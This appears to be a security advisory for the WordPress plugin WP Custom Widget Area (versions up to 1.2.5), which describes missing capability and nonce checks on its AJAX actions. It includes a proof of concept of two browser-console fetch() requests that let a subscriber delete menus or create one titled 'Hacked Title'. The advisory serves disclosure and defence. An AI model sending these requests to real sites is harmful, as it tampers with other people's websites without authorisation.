WP Custom Widget Area <= 1.2.5 - Subscriber+ Menus Creation/Deletion/Update

2023-12-2100:00:00

Krzysztof Zając (CERT PL)

wpscan.com

wordpress

custom widget area

security vulnerability

ajax actions

subscriber+ privilege

AI Score

6.4

Confidence

High

EPSS

Percentile

14.0%

JSON

Description The plugin does not properly apply capability and nonce checks on any of its AJAX action callback functions, which could allow attackers with subscriber+ privilege to create, delete or modify menus on the site.

PoC

Log in as a subscriber, and paste any of the following fetch() call in your browser’s console: # Deletes an existing menu fetch(“http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=delete_menu”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “data[cwa_id]=test”, “method”: “POST”, }) # Creates a new menu with a title set to “Hacked Title” fetch(“http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=add_menu”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “data[cwa_id]=test&data;[cwa_name]=Hacked+Title”, “method”: “POST”, })